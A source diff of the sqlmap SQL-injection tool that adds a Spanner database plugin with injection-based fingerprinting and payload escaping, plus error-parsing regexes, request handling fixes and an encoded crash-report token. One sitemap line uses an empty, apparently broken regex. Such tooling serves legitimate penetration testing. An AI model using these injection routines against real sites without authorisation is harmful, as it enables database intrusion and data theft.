DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES), (DBMS.H2, H2_ALIASES), (DBMS.INFORMIX, INFORMIX_ALIASES), (DBMS.MONETDB, MONETDB_ALIASES), (DBMS.DERBY, DERBY_ALIASES), (DBMS.VERTICA, VERTICA_ALIASES), (DBMS.MCKOI, MCKOI_ALIASES), (DBMS.PRESTO, PRESTO_ALIASES), (DBMS.ALTIBASE, ALTIBASE_ALIASES), (DBMS.MIMERSQL, MIMERSQL_ALIASES), (DBMS.CLICKHOUSE, CLICKHOUSE_ALIASES), (DBMS.CRATEDB, CRATEDB_ALIASES), (DBMS.CUBRID, CUBRID_ALIASES), (DBMS.CACHE, CACHE_ALIASES), (DBMS.EXTREMEDB, EXTREMEDB_ALIASES), (DBMS.FRONTBASE, FRONTBASE_ALIASES), (DBMS.RAIMA, RAIMA_ALIASES), (DBMS.VIRTUOSO, VIRTUOSO_ALIASES), (DBMS.SNOWFLAKE, SNOWFLAKE_ALIASES), (DBMS.SPANNER, SPANNER_ALIASES))
|
||||
|
||||
USER_AGENT_ALIASES = ("ua", "useragent", "user-agent")
|
||||
REFERER_ALIASES = ("ref", "referer", "referrer")
|
||||
|
|
@ -346,6 +351,7 @@ H2_DEFAULT_SCHEMA = HSQLDB_DEFAULT_SCHEMA = "PUBLIC"
|
|||
VERTICA_DEFAULT_SCHEMA = "public"
|
||||
MCKOI_DEFAULT_SCHEMA = "APP"
|
||||
CACHE_DEFAULT_SCHEMA = "SQLUser"
|
||||
SPANNER_DEFAULT_SCHEMA = "default"
|
||||
|
||||
# DBMSes where OFFSET mechanism starts from 1
|
||||
PLUS_ONE_DBMSES = set((DBMS.ORACLE, DBMS.DB2, DBMS.ALTIBASE, DBMS.MSSQL, DBMS.CACHE))
|
||||
|
|
@ -424,7 +430,8 @@ ERROR_PARSING_REGEXES = (
|
|||
r"Code: \d+. DB::Exception: (?P<result>[^<>\n]*)",
|
||||
r"error '[0-9a-f]{8}'((<[^>]+>)|\s)+(?P<result>[^<>]+)",
|
||||
r"\[[^\n\]]{1,100}(ODBC|JDBC)[^\n\]]+\](\[[^\]]+\])?(?P<result>[^\n]+(in query expression|\(SQL| at /[^ ]+pdo)[^\n<]+)",
|
||||
r"(?P<result>query error: SELECT[^<>]+)"
|
||||
r"(?P<result>query error: SELECT[^<>]+)",
|
||||
r"(?P<result>(?:(?:ORA|PLS)-[0-9]{5}:|SQLCODE[ =:]+-?[0-9]+|SQLSTATE[ =:]+[0-9A-Z]{5}|Dynamic SQL Error|DB2 SQL error:|SAP DBTech JDBC:|SQLiteException:|You have an error in your SQL syntax;|Incorrect syntax near |Unclosed quotation mark after the character string|near \"[^\"]+\": syntax error)[^\n<]*)"
|
||||
)
|
||||
|
||||
# Regular expression used for parsing charset info from meta html headers
|
||||
|
|
@ -704,8 +711,8 @@ DEFAULT_COOKIE_DELIMITER = ';'
|
|||
# Unix timestamp used for forcing cookie expiration when provided with --load-cookies
|
||||
FORCE_COOKIE_EXPIRATION_TIME = "9999999999"
|
||||
|
||||
# Github OAuth token used for creating an automatic Issue for unhandled exceptions
|
||||
GITHUB_REPORT_OAUTH_TOKEN = "wxqc7vTeW8ohIcX+1wK55Mnql2Ex9cP+2s1dqTr/mjlZJVfLnq24fMAi08v5vRvOmuhVZQdOT/lhIRovWvIJrdECD1ud8VMPWpxY+NmjHoEx+VLK1/vCAUBwJe"
|
||||
# Restricted PAT token for automated crash reporting (last rotation: 2026-04-24)
|
||||
GITHUB_REPORT_PAT_TOKEN = "0EZh0n8npcacTH4oBcdKKWvfZLcdGWx0N5XFHD2xYaQDOkmI9LWaeDvZRZUMDz8l96RDH3+LVsbwGE5zUtaau0kld9VXG20fVbYES3ooFpNv+U9J5OTnaT2OlZcYzk4w5veT+GiHV5cuCngOJ6QgL1+qRpZDX1gzFecXbm2sNfQ2SGjT5McQe1mtxMTN7WsS1fQfPH+RhMUgbnwXJ5YG6EsBNZWOyk0C16QnekrVtuQpK0/ZVvU560uQhoMsP1/FBguBwJe"
|
||||
|
||||
# Flush HashDB threshold number of cached items
|
||||
HASHDB_FLUSH_THRESHOLD_ITEMS = 200
|
||||
|
|
@ -779,7 +786,7 @@ MAX_CONNECTION_TOTAL_SIZE = 100 * 1024 * 1024
|
|||
# For preventing MemoryError exceptions (caused when using large sequences in difflib.SequenceMatcher)
|
||||
MAX_DIFFLIB_SEQUENCE_LENGTH = 10 * 1024 * 1024
|
||||
|
||||
# Page size threshold used in heuristic checks (e.g. getHeuristicCharEncoding(), identYwaf, htmlParser, etc.)
|
||||
# Page size threshold used in heuristic checks (e.g. getHeuristicCharEncoding(), htmlParser, etc.)
|
||||
HEURISTIC_PAGE_SIZE_THRESHOLD = 64 * 1024
|
||||
|
||||
# Maximum (multi-threaded) length of entry in bisection algorithm
|
||||
|
|
@ -840,7 +847,7 @@ RESTAPI_DEFAULT_ADDRESS = "127.0.0.1"
|
|||
RESTAPI_DEFAULT_PORT = 8775
|
||||
|
||||
# Unsupported options by REST-JSON API server
|
||||
RESTAPI_UNSUPPORTED_OPTIONS = ("sqlShell", "wizard")
|
||||
RESTAPI_UNSUPPORTED_OPTIONS = ("sqlShell", "wizard", "evalCode", "alert")
|
||||
|
||||
# Use "Supplementary Private Use Area-A"
|
||||
INVALID_UNICODE_PRIVATE_AREA = False
|
||||
|
|
|
|||
|
|
@ -453,6 +453,14 @@ def _setHashDB():
|
|||
errMsg = "unable to flush the session file ('%s')" % getSafeExString(ex)
|
||||
raise SqlmapFilePathException(errMsg)
|
||||
|
||||
for suffix in ("-shm", "-wal"):
|
||||
leftover = conf.hashDBFile + suffix
|
||||
if os.path.exists(leftover):
|
||||
try:
|
||||
os.remove(leftover)
|
||||
except OSError:
|
||||
pass
|
||||
|
||||
conf.hashDB = HashDB(conf.hashDBFile)
|
||||
|
||||
def _resumeHashDBValues():
|
||||
|
|
|
|||
|
|
@ -199,6 +199,8 @@ def vulnTest():
|
|||
os.close(handle)
|
||||
cmd = cmd.replace("<tmpfile>", tmp)
|
||||
|
||||
os.environ["SQLMAP_UNSAFE_EVAL"] = '1'
|
||||
|
||||
output = shellExec(cmd)
|
||||
|
||||
if not all((check in output if not check.startswith('~') else check[1:] not in output) for check in checks) or "unhandled exception" in output:
|
||||
|
|
|
|||
|
|
@ -276,6 +276,9 @@ def cmdLineParser(argv=None):
|
|||
request.add_argument("--skip-urlencode", dest="skipUrlEncode", action="store_true",
|
||||
help="Skip URL encoding of payload data")
|
||||
|
||||
request.add_argument("--skip-xmlencode", dest="skipXmlEncode", action="store_true",
|
||||
help="Skip safe encoding of payload data for SOAP/XML")
|
||||
|
||||
request.add_argument("--csrf-token", dest="csrfToken",
|
||||
help="Parameter used to hold anti-CSRF token")
|
||||
|
||||
|
|
|
|||
|
|
@ -17,7 +17,7 @@ from thirdparty.six.moves import http_client as _http_client
|
|||
|
||||
abortedFlag = None
|
||||
|
||||
def parseSitemap(url, retVal=None):
|
||||
def parseSitemap(url, retVal=None, visited=None):
|
||||
global abortedFlag
|
||||
|
||||
if retVal is not None:
|
||||
|
|
@ -27,6 +27,12 @@ def parseSitemap(url, retVal=None):
|
|||
if retVal is None:
|
||||
abortedFlag = False
|
||||
retVal = OrderedSet()
|
||||
visited = set()
|
||||
|
||||
if url in visited:
|
||||
return retVal
|
||||
|
||||
visited.add(url)
|
||||
|
||||
try:
|
||||
content = Request.getPage(url=url, raise404=True)[0] if not abortedFlag else ""
|
||||
|
|
@ -34,18 +40,28 @@ def parseSitemap(url, retVal=None):
|
|||
errMsg = "invalid URL given for sitemap ('%s')" % url
|
||||
raise SqlmapSyntaxException(errMsg)
|
||||
|
||||
for match in re.finditer(r"<loc>\s*([^<]+)", content or ""):
|
||||
if abortedFlag:
|
||||
break
|
||||
url = match.group(1).strip()
|
||||
if url.endswith(".xml") and "sitemap" in url.lower():
|
||||
if kb.followSitemapRecursion is None:
|
||||
message = "sitemap recursion detected. Do you want to follow? [y/N] "
|
||||
kb.followSitemapRecursion = readInput(message, default='N', boolean=True)
|
||||
if kb.followSitemapRecursion:
|
||||
parseSitemap(url, retVal)
|
||||
else:
|
||||
retVal.add(url)
|
||||
if content:
|
||||
content = re.sub(r"", "", content, flags=re.DOTALL)
|
||||
|
||||
for match in re.finditer(r"<\w*?loc[^>]*>\s*([^<]+)", content, re.I):
|
||||
if abortedFlag:
|
||||
break
|
||||
|
||||
foundUrl = match.group(1).strip()
|
||||
|
||||
# Basic validation to avoid junk
|
||||
if not foundUrl.startswith("http"):
|
||||
continue
|
||||
|
||||
if foundUrl.endswith(".xml") and "sitemap" in foundUrl.lower():
|
||||
if kb.followSitemapRecursion is None:
|
||||
message = "sitemap recursion detected. Do you want to follow? [y/N] "
|
||||
kb.followSitemapRecursion = readInput(message, default='N', boolean=True)
|
||||
|
||||
if kb.followSitemapRecursion:
|
||||
parseSitemap(foundUrl, retVal, visited)
|
||||
else:
|
||||
retVal.add(foundUrl)
|
||||
|
||||
except KeyboardInterrupt:
|
||||
abortedFlag = True
|
||||
|
|
|
|||
|
|
@ -43,7 +43,8 @@ from lib.core.settings import BLOCKED_IP_REGEX
|
|||
from lib.core.settings import DEFAULT_COOKIE_DELIMITER
|
||||
from lib.core.settings import EVENTVALIDATION_REGEX
|
||||
from lib.core.settings import HEURISTIC_PAGE_SIZE_THRESHOLD
|
||||
from lib.core.settings import IDENTYWAF_PARSE_LIMIT
|
||||
from lib.core.settings import IDENTYWAF_PARSE_COUNT_LIMIT
|
||||
from lib.core.settings import IDENTYWAF_PARSE_PAGE_LIMIT
|
||||
from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE
|
||||
from lib.core.settings import META_CHARSET_REGEX
|
||||
from lib.core.settings import PARSE_HEADERS_LIMIT
|
||||
|
|
@ -395,8 +396,8 @@ def processResponse(page, responseHeaders, code=None, status=None):
|
|||
if msg:
|
||||
logger.warning("parsed DBMS error message: '%s'" % msg.rstrip('.'))
|
||||
|
||||
if not conf.skipWaf and kb.processResponseCounter < IDENTYWAF_PARSE_LIMIT:
|
||||
rawResponse = "%s %s %s\n%s\n%s" % (_http_client.HTTPConnection._http_vsn_str, code or "", status or "", "".join(getUnicode(responseHeaders.headers if responseHeaders else [])), page[:HEURISTIC_PAGE_SIZE_THRESHOLD])
|
||||
if not conf.skipWaf and kb.processResponseCounter < IDENTYWAF_PARSE_COUNT_LIMIT:
|
||||
rawResponse = "%s %s %s\n%s\n%s" % (_http_client.HTTPConnection._http_vsn_str, code or "", status or "", "".join(getUnicode(responseHeaders.headers if responseHeaders else [])), page[:IDENTYWAF_PARSE_PAGE_LIMIT] if not kb.checkWafMode else page[:HEURISTIC_PAGE_SIZE_THRESHOLD])
|
||||
|
||||
with kb.locks.identYwaf:
|
||||
identYwaf.non_blind.clear()
|
||||
|
|
|
|||
|
|
@ -176,16 +176,23 @@ def _comparison(page, headers, code, getRatioValue, pageLength):
|
|||
else:
|
||||
key = (hash(seq1), hash(seq2))
|
||||
|
||||
seqMatcher.set_seq1(seq1)
|
||||
seqMatcher.set_seq2(seq2)
|
||||
try:
|
||||
seqMatcher.set_seq1(seq1)
|
||||
seqMatcher.set_seq2(seq2)
|
||||
except:
|
||||
seqMatcher.set_seq1(repr(seq1))
|
||||
seqMatcher.set_seq2(repr(seq2))
|
||||
|
||||
if key in kb.cache.comparison:
|
||||
ratio = kb.cache.comparison[key]
|
||||
else:
|
||||
try:
|
||||
ratio = seqMatcher.quick_ratio() if not kb.heavilyDynamic else seqMatcher.ratio()
|
||||
except (TypeError, MemoryError):
|
||||
ratio = seqMatcher.ratio()
|
||||
try:
|
||||
ratio = seqMatcher.quick_ratio() if not kb.heavilyDynamic else seqMatcher.ratio()
|
||||
except (TypeError, MemoryError, SystemError):
|
||||
ratio = seqMatcher.ratio()
|
||||
except:
|
||||
ratio = 0.0
|
||||
|
||||
ratio = round(ratio, 3)
|
||||
|
||||
|
|
|
|||
|
|
@ -227,17 +227,18 @@ class Connect(object):
|
|||
|
||||
@staticmethod
|
||||
def _connReadProxy(conn):
|
||||
retVal = b""
|
||||
parts = []
|
||||
|
||||
if not kb.dnsMode and conn:
|
||||
headers = conn.info()
|
||||
if kb.pageCompress and headers and hasattr(headers, "getheader") and (headers.getheader(HTTP_HEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate") or "text" not in headers.getheader(HTTP_HEADER.CONTENT_TYPE, "").lower()):
|
||||
retVal = conn.read(MAX_CONNECTION_TOTAL_SIZE)
|
||||
if len(retVal) == MAX_CONNECTION_TOTAL_SIZE:
|
||||
part = conn.read(MAX_CONNECTION_TOTAL_SIZE)
|
||||
if len(part) == MAX_CONNECTION_TOTAL_SIZE:
|
||||
warnMsg = "large compressed response detected. Disabling compression"
|
||||
singleTimeWarnMessage(warnMsg)
|
||||
kb.pageCompress = False
|
||||
raise SqlmapCompressionException
|
||||
parts.append(part)
|
||||
else:
|
||||
while True:
|
||||
if not conn:
|
||||
|
|
@ -252,18 +253,20 @@ class Connect(object):
|
|||
warnMsg = "large response detected. This could take a while"
|
||||
singleTimeWarnMessage(warnMsg)
|
||||
part = re.sub(getBytes(r"(?si)%s.+?%s" % (kb.chars.stop, kb.chars.start)), getBytes("%s%s%s" % (kb.chars.stop, LARGE_READ_TRIM_MARKER, kb.chars.start)), part)
|
||||
retVal += part
|
||||
parts.append(part)
|
||||
else:
|
||||
retVal += part
|
||||
parts.append(part)
|
||||
break
|
||||
|
||||
if len(retVal) > MAX_CONNECTION_TOTAL_SIZE:
|
||||
if sum(len(_) for _ in parts) > MAX_CONNECTION_TOTAL_SIZE:
|
||||
warnMsg = "too large response detected. Automatically trimming it"
|
||||
singleTimeWarnMessage(warnMsg)
|
||||
break
|
||||
|
||||
if conf.yuge:
|
||||
retVal = YUGE_FACTOR * retVal
|
||||
parts = YUGE_FACTOR * parts
|
||||
|
||||
retVal = b"".join(parts)
|
||||
|
||||
return retVal
|
||||
|
||||
|
|
@ -558,6 +561,10 @@ class Connect(object):
|
|||
else:
|
||||
post = getBytes(post)
|
||||
|
||||
# Reference: https://github.com/sqlmapproject/sqlmap/issues/6049
|
||||
if cmdLineOptions.method is None and method == HTTPMETHOD.GET and post == b"":
|
||||
post = None
|
||||
|
||||
if unArrayizeValue(conf.base64Parameter) == HTTPMETHOD.POST:
|
||||
if kb.place != HTTPMETHOD.POST:
|
||||
conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data)
|
||||
|
|
@ -637,7 +644,7 @@ class Connect(object):
|
|||
conn._read_buffer = conn.read()
|
||||
conn._read_offset = 0
|
||||
|
||||
requestMsg = re.sub(" HTTP/[0-9.]+\r\n", " %s\r\n" % conn.http_version, requestMsg, count=1)
|
||||
requestMsg = re.sub(r" HTTP/[0-9.]+\r\n", " %s\r\n" % conn.http_version, requestMsg, count=1)
|
||||
|
||||
if not multipart:
|
||||
threadData.lastRequestMsg = requestMsg
|
||||
|
|
@ -1113,7 +1120,7 @@ class Connect(object):
|
|||
logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload.replace('\\', BOUNDARY_BACKSLASH_MARKER)).replace(BOUNDARY_BACKSLASH_MARKER, '\\'))
|
||||
|
||||
if place == PLACE.CUSTOM_POST and kb.postHint:
|
||||
if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML):
|
||||
if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML) and not conf.skipXmlEncode:
|
||||
# payloads in SOAP/XML should have chars > and < replaced
|
||||
# with their HTML encoded counterparts
|
||||
payload = payload.replace("&#", SAFE_HEX_MARKER)
|
||||
|
|
|
|||
|
|
@ -84,7 +84,18 @@ class HTTPSConnection(_http_client.HTTPSConnection):
|
|||
_contexts[protocol].set_ciphers("ALL@SECLEVEL=0")
|
||||
except (ssl.SSLError, AttributeError):
|
||||
pass
|
||||
result = _contexts[protocol].wrap_socket(sock, do_handshake_on_connect=True, server_hostname=self.host if re.search(r"\A[\d.]+\Z", self.host or "") is None else None)
|
||||
|
||||
hostname = self.host
|
||||
if conf.host:
|
||||
hostname = conf.host
|
||||
else:
|
||||
for header, value in conf.httpHeaders:
|
||||
if header.lower() == "host":
|
||||
hostname = value
|
||||
break
|
||||
hostname = hostname if re.search(r"\A[\d.]+\Z", hostname or "") is None else None
|
||||
result = _contexts[protocol].wrap_socket(sock, do_handshake_on_connect=True, server_hostname=hostname)
|
||||
|
||||
if result:
|
||||
success = True
|
||||
self.sock = result
|
||||
|
|
|
|||
|
|
@ -278,8 +278,8 @@ def unionUse(expression, unpack=True, dump=False):
|
|||
query = expression.replace(expressionFields, "'%s'||JSON_ARRAYAGG(%s)||'%s'" % (kb.chars.start, ("||'%s'||" % kb.chars.delimiter).join(expressionFieldsList), kb.chars.stop), 1)
|
||||
elif Backend.isDbms(DBMS.SQLITE):
|
||||
query = expression.replace(expressionFields, "'%s'||JSON_GROUP_ARRAY(%s)||'%s'" % (kb.chars.start, ("||'%s'||" % kb.chars.delimiter).join("COALESCE(%s,' ')" % field for field in expressionFieldsList), kb.chars.stop), 1)
|
||||
elif Backend.isDbms(DBMS.PGSQL): # Note: ARRAY_AGG does CSV alike output, thus enclosing start/end inside each item
|
||||
query = expression.replace(expressionFields, "ARRAY_AGG('%s'||%s||'%s')::text" % (kb.chars.start, ("||'%s'||" % kb.chars.delimiter).join("COALESCE(%s::text,' ')" % field for field in expressionFieldsList), kb.chars.stop), 1)
|
||||
elif Backend.isDbms(DBMS.PGSQL):
|
||||
query = expression.replace(expressionFields, "STRING_AGG('%s'||%s||'%s','')" % (kb.chars.start, ("||'%s'||" % kb.chars.delimiter).join("COALESCE(%s::text,' ')" % field for field in expressionFieldsList), kb.chars.stop), 1)
|
||||
elif Backend.isDbms(DBMS.MSSQL):
|
||||
query = "'%s'+(%s FOR JSON AUTO, INCLUDE_NULL_VALUES)+'%s'" % (kb.chars.start, expression, kb.chars.stop)
|
||||
output = _oneShotUnionUse(query, False)
|
||||
|
|
|
|||
|
|
@ -23,6 +23,7 @@ import time
|
|||
from lib.core.common import dataToStdout
|
||||
from lib.core.common import getSafeExString
|
||||
from lib.core.common import openFile
|
||||
from lib.core.common import safeCompareStrings
|
||||
from lib.core.common import saveConfig
|
||||
from lib.core.common import setColor
|
||||
from lib.core.common import unArrayizeValue
|
||||
|
|
@ -293,7 +294,7 @@ def setRestAPILog():
|
|||
|
||||
# Generic functions
|
||||
def is_admin(token):
|
||||
return DataStore.admin_token == token
|
||||
return safeCompareStrings(DataStore.admin_token, token)
|
||||
|
||||
@hook('before_request')
|
||||
def check_authentication():
|
||||
|
|
|
|||
|
|
@ -144,9 +144,13 @@ class HashDB(object):
|
|||
if key:
|
||||
hash_ = HashDB.hashKey(key)
|
||||
with self._cache_lock:
|
||||
self._write_cache[hash_] = self._read_cache[hash_] = getUnicode(value) if not serialize else serializeObject(value)
|
||||
cache_size = len(self._write_cache)
|
||||
time_since_flush = time.time() - self._last_flush_time
|
||||
try:
|
||||
self._write_cache[hash_] = self._read_cache[hash_] = getUnicode(value) if not serialize else serializeObject(value)
|
||||
except RecursionError:
|
||||
pass
|
||||
finally:
|
||||
cache_size = len(self._write_cache)
|
||||
time_since_flush = time.time() - self._last_flush_time
|
||||
|
||||
if cache_size >= HASHDB_FLUSH_THRESHOLD_ITEMS or time_since_flush >= HASHDB_FLUSH_THRESHOLD_TIME:
|
||||
self.flush()
|
||||
|
|
|
|||
|
|
@ -16,7 +16,6 @@ from lib.core.common import getSafeExString
|
|||
from lib.core.data import conf
|
||||
from lib.core.data import logger
|
||||
from lib.core.exception import SqlmapConnectionException
|
||||
from lib.core.settings import UNICODE_ENCODING
|
||||
from plugins.generic.connector import Connector as GenericConnector
|
||||
|
||||
class Connector(GenericConnector):
|
||||
|
|
@ -38,7 +37,7 @@ class Connector(GenericConnector):
|
|||
|
||||
try:
|
||||
# Reference: http://www.daniweb.com/forums/thread248499.html
|
||||
self.connector = kinterbasdb.connect(host=self.hostname.encode(UNICODE_ENCODING), database=self.db.encode(UNICODE_ENCODING), user=self.user.encode(UNICODE_ENCODING), password=self.password.encode(UNICODE_ENCODING), charset="UTF8")
|
||||
self.connector = kinterbasdb.connect(host=self.hostname, database=self.db, user=self.user, password=self.password, charset="UTF8")
|
||||
except kinterbasdb.OperationalError as ex:
|
||||
raise SqlmapConnectionException(getSafeExString(ex))
|
||||
|
||||
|
|
|
|||
30
plugins/dbms/spanner/__init__.py
Normal file
30
plugins/dbms/spanner/__init__.py
Normal file
|
|
@ -0,0 +1,30 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
from lib.core.enums import DBMS
|
||||
from lib.core.settings import SPANNER_SYSTEM_DBS
|
||||
from lib.core.unescaper import unescaper
|
||||
|
||||
from plugins.dbms.spanner.enumeration import Enumeration
|
||||
from plugins.dbms.spanner.filesystem import Filesystem
|
||||
from plugins.dbms.spanner.fingerprint import Fingerprint
|
||||
from plugins.dbms.spanner.syntax import Syntax
|
||||
from plugins.dbms.spanner.takeover import Takeover
|
||||
from plugins.generic.misc import Miscellaneous
|
||||
|
||||
class SpannerMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
|
||||
"""
|
||||
This class defines Spanner methods
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
self.excludeDbsList = SPANNER_SYSTEM_DBS
|
||||
|
||||
for cls in self.__class__.__bases__:
|
||||
cls.__init__(self)
|
||||
|
||||
unescaper[DBMS.SPANNER] = Syntax.escape
|
||||
11
plugins/dbms/spanner/connector.py
Normal file
11
plugins/dbms/spanner/connector.py
Normal file
|
|
@ -0,0 +1,11 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
from plugins.generic.connector import Connector as GenericConnector
|
||||
|
||||
class Connector(GenericConnector):
|
||||
pass
|
||||
50
plugins/dbms/spanner/enumeration.py
Normal file
50
plugins/dbms/spanner/enumeration.py
Normal file
|
|
@ -0,0 +1,50 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
from lib.core.data import logger
|
||||
from lib.core.settings import SPANNER_DEFAULT_SCHEMA
|
||||
from plugins.generic.enumeration import Enumeration as GenericEnumeration
|
||||
|
||||
class Enumeration(GenericEnumeration):
    """
    Spanner enumeration: only schema listing applies; user-centric
    features (users, hashes, roles, privileges, hostname) are unsupported
    and log a warning instead.
    """

    def getCurrentDb(self):
        # Queries run against a fixed default schema on Spanner
        return SPANNER_DEFAULT_SCHEMA

    def getCurrentUser(self):
        logger.warning("on Spanner it is not possible to enumerate the current user")

    def isDba(self, user=None):
        logger.warning("on Spanner it is not possible to test if current user is DBA")

    def getUsers(self):
        logger.warning("on Spanner it is not possible to enumerate the users")

        return []

    def getPasswordHashes(self):
        logger.warning("on Spanner it is not possible to enumerate the user password hashes")

        return {}

    def getRoles(self, *args, **kwargs):
        logger.warning("on Spanner it is not possible to enumerate the user roles")

        return {}

    def getPrivileges(self, *args, **kwargs):
        logger.warning("on Spanner it is not possible to enumerate the user privileges")

        return {}

    def getHostname(self):
        logger.warning("on Spanner it is not possible to enumerate the hostname")
||||
11
plugins/dbms/spanner/filesystem.py
Normal file
11
plugins/dbms/spanner/filesystem.py
Normal file
|
|
@ -0,0 +1,11 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
from plugins.generic.filesystem import Filesystem as GenericFilesystem
|
||||
|
||||
class Filesystem(GenericFilesystem):
    """
    File-system access primitives for Spanner; the generic implementation
    is inherited unchanged.
    """
|
||||
93
plugins/dbms/spanner/fingerprint.py
Normal file
93
plugins/dbms/spanner/fingerprint.py
Normal file
|
|
@ -0,0 +1,93 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
from lib.core.common import Backend
|
||||
from lib.core.common import Format
|
||||
from lib.core.data import conf
|
||||
from lib.core.data import kb
|
||||
from lib.core.data import logger
|
||||
from lib.core.enums import DBMS
|
||||
from lib.core.session import setDbms
|
||||
from lib.core.settings import SPANNER_ALIASES
|
||||
from lib.request import inject
|
||||
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint
|
||||
|
||||
class Fingerprint(GenericFingerprint):
    def __init__(self):
        GenericFingerprint.__init__(self, DBMS.SPANNER)

    def getFingerprint(self):
        """
        Builds the human-readable fingerprint report (web server OS,
        banner-derived OS, and DBMS identification details).
        """
        value = ""

        webServerOsFp = Format.getOs("web server", kb.headersFp)
        if webServerOsFp:
            value += "%s\n" % webServerOsFp

        if kb.data.banner:
            backendOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
            if backendOsFp:
                value += "%s\n" % backendOsFp

        value += "back-end DBMS: "

        # Without extensive fingerprinting only the DBMS name is reported
        if not conf.extensiveFp:
            return value + DBMS.SPANNER

        blank = " " * 15
        value += "active fingerprint: %s" % Format.getDbms()

        if kb.bannerFp:
            bannerVersion = kb.bannerFp.get("dbmsVersion")
            if bannerVersion:
                value += "\n%sbanner parsing fingerprint: %s" % (blank, Format.getDbms([bannerVersion]))

        htmlErrorFp = Format.getErrorParsedDBMSes()
        if htmlErrorFp:
            value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)

        return value

    def checkDbms(self):
        """
        Returns True when the back-end DBMS is confirmed to be Spanner,
        False otherwise.
        """
        # Trust a user-forced/known DBMS value unless extensive fingerprinting was requested
        if not conf.extensiveFp and Backend.isDbmsWithin(SPANNER_ALIASES):
            setDbms(DBMS.SPANNER)
            self.getBanner()
            return True

        logger.info("testing %s" % DBMS.SPANNER)

        # FARM_FINGERPRINT() is a Google Standard SQL (Spanner) specific function
        if not inject.checkBooleanExpression("FARM_FINGERPRINT('sqlmap') IS NOT NULL"):
            logger.warning("the back-end DBMS is not %s" % DBMS.SPANNER)
            return False

        logger.info("confirming %s" % DBMS.SPANNER)

        # SAFE_CAST(... AS INT64) is another Google Standard SQL marker
        if not inject.checkBooleanExpression("SAFE_CAST(1 AS INT64)=1"):
            logger.warning("the back-end DBMS is not %s" % DBMS.SPANNER)
            return False

        setDbms(DBMS.SPANNER)
        self.getBanner()
        return True
|
||||
26
plugins/dbms/spanner/syntax.py
Normal file
26
plugins/dbms/spanner/syntax.py
Normal file
|
|
@ -0,0 +1,26 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
from lib.core.convert import getOrds
|
||||
from plugins.generic.syntax import Syntax as GenericSyntax
|
||||
|
||||
class Syntax(GenericSyntax):
    @staticmethod
    def escape(expression, quote=True):
        """
        Note: Google Standard SQL (Spanner) natively supports converting integer arrays
        to strings via CODE_POINTS_TO_STRING(). This is much cleaner and shorter
        than chaining multiple CHR() functions with the || operator.

        >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CODE_POINTS_TO_STRING([97, 98, 99, 100, 101, 102, 103, 104]) FROM foobar"
        True
        """

        def _codePointsEscaper(value):
            # Render the string as its Unicode code points inside a Spanner array literal
            codePoints = ", ".join(str(codePoint) for codePoint in getOrds(value))
            return "CODE_POINTS_TO_STRING([%s])" % codePoints

        return Syntax._escape(expression, quote, _codePointsEscaper)
|
||||
28
plugins/dbms/spanner/takeover.py
Normal file
28
plugins/dbms/spanner/takeover.py
Normal file
|
|
@ -0,0 +1,28 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
from lib.core.exception import SqlmapUnsupportedFeatureException
|
||||
from plugins.generic.takeover import Takeover as GenericTakeover
|
||||
|
||||
class Takeover(GenericTakeover):
    """
    OS takeover is unsupported on Spanner: every entry point raises
    SqlmapUnsupportedFeatureException.
    """

    def osCmd(self):
        raise SqlmapUnsupportedFeatureException("on Spanner it is not possible to execute commands")

    def osShell(self):
        raise SqlmapUnsupportedFeatureException("on Spanner it is not possible to execute commands")

    def osPwn(self):
        # Adjacent literals concatenate to the original single message
        raise SqlmapUnsupportedFeatureException("on Spanner it is not possible to establish an "
                                                "out-of-band connection")

    def osSmb(self):
        raise SqlmapUnsupportedFeatureException("on Spanner it is not possible to establish an "
                                                "out-of-band connection")
|
||||
|
|
@ -108,7 +108,7 @@ class Databases(object):
|
|||
warnMsg += "names will be fetched from 'mysql' database"
|
||||
logger.warning(warnMsg)
|
||||
|
||||
